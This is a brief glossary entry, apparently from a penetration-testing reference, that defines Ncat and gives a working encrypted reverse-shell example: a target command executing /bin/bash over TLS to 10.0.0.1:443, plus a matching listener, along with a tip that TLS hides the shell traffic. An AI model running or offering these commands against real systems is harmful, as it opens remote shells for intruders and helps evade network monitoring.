Glossary
Ncat
The modern netcat replacement shipped with Nmap, adding TLS (--ssl) and a kept --exec flag — useful for encrypted reverse shells.
Ncat is the feature-rich netcat reimplementation that ships with Nmap.
Unlike modern netcat it keeps an --exec flag and adds
TLS:
ncat 10.0.0.1 443 --ssl --exec "/bin/bash" # target
ncat -lvnp 443 --ssl # listener
The --ssl option wraps the session in TLS so it does not stand out as
plaintext shell I/O. Both ends must agree on --ssl. See
netcat reverse shells.